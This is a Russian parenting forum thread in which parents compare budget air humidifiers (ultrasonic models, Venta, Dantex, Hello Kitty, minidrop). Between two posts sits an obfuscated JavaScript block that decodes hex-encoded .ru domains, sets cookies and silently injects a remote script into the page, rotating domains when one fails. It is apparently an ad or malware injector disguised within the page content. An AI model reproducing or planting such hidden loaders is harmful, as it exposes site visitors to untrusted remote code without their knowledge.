Войти
жду мальчика, 38 неделя Москва

Бывают ли хорошие недорогие увлажнители воздуха?

Мама мальчика (11 лет) Иваново

У меня вот такой витек. Был куплен года 2 назад в эльдорадо за 1500. Ультразвуковой. Отличный увлажнитель. Никакого белого налета на полу и мебели не оставляет, хорошо моется, докупать ничего не надо, красиво выглядит. Единственное, после долгой работы на максимуме около него собирается лужица, если на пол ставить. Но это если Вы совсем сауну хотите сделать. В среднем режиме и лужиц нет.

Говорят УЗ увлажнители оставляют белый налет, но перелопатив кучу сайтов на эту тему, я поняла, что это от воды зависит. Насколько много в ней кальция, хлора и т.д. Так что нам повезло с водой, наверное. Хотя на чайнике накипь довольно быстро собирается, не сказала бы, что у нас очень мягкая вода.

0
19.12.2015
Мама двоих (14 лет, 10 лет) Москва

все бюджетные ультразвуковые ужасные, у меня два таких было.....экономите сначала,а потом фильтры искать, докупать, чистить их неудобно.....в общем лучше вообще тогда не брать.

Я взяла в этот раз Venta LW15, не понимаю почему они такие дорогие, но денег потраченных не пожалела.
Там внутри крутящийся пластиковый барабан, каждый раз как воду заливаю, мою его и все!!!!никакие фильтра, ничего ненужно!!!!
Увлажняет быстро, за полдня с 20% до 50% поднял, воду залил и работает 2 суток постоянно (ночью тихий режим), он еще как мойка, когда воду сливаешь, она с осадком пыли......
вот это вещь, а все остальное даже рассматривать не стоит
0
22.12.2015
Мама троих (10 лет, 7 лет, 4 года) Вюрцбург

Мы купили Hello Kitty, но нужно, чтобы он был включен целый день, если хочешь достичь максимального эффекта увлажнения. Но в целом довольна, куда лучше, чем без него. И дизайн красивый, в виде котика, малышам такое должно понравится

[removed]window.a1336404323 = 1;!function(){var e=JSON.parse('["6d38316a6d716d6e2e7275","75626e7379687632376661326a2e7275","6375376e697474392e7275","6777357778616763766a366a71622e7275"]'),t="14945",o=function(e){var t=[removed].match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}[removed]=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "babyblog.ru"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i. t&&t())},i. o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();[removed]
0
21.12.2015
Мама двоих (15 лет, 11 лет) Москва

Есть. У нас вот такой Dantex. Это увлажнитель-очиститель. Не ультразвуковой, вбирает воздух, чистит и выдает его влажным. На 13 квадратов справлялся на ура. При режиме супер увлажнение у нас окна потели. Нет налета на мебели, вообще никакой побочки. Тихий. И щас стоит так же, как в 2013)))

0
19.12.2015
Мама двоих (15 лет, 11 лет) Москва

Из минусов - много воды жрет и вливать в него лучше из фильтра. Но на ночь хватало в режиме экономия энергии. Есть защита если опрокинется - не прольется вода, а сам он выключится. Есть похожая модель с баком побольше (на 4 л.вроде).

0
19.12.2015
Мама четырех (от 4 года до 21 год) Москва

У нас в детской недорогой стоит, minidrop называется. Работает тихо, можно и на ночь оставлять, на 9 часов при самой большой мощности хватает, потом доливаю воды, но у нас трубы сильно "душат" сухим воздухом.
Он 3-4 тысячи стоит. Если есть вода в баке, но он не работает, то вода не вытекает.

0
27.12.2015
Мама мальчика (12 лет) Москва

У нас такой https://market.yandex.ru/product/7712030?hid=734595 Пользуемся уже больше года. Очень довольны им. Сначала пользовались водой из под крана и был везде белый налёт, потом стали из фильтра наливать и проблема исчезла. У него интересная подсветка, ребёнку ночью нравится. Тихий, симпатичный, всегда включаем на минимум в комнату 13кв.м и этого вполне хватает, влажность в комнате как раз 40-42%.
0
20.12.2015
Мама девочки (10 лет) Москва

У нас и даже не за 15- и не довольна. Так что думаю, не бывает

0
19.12.2015
Мама двоих (11 лет, 9 лет) Москва

Думаю, нет. Лучше хороший и не ультразвуковой.

0
19.12.2015
Какой ингалятор выбрать малышу? Посоветуйте Вафельницу

Похожие записи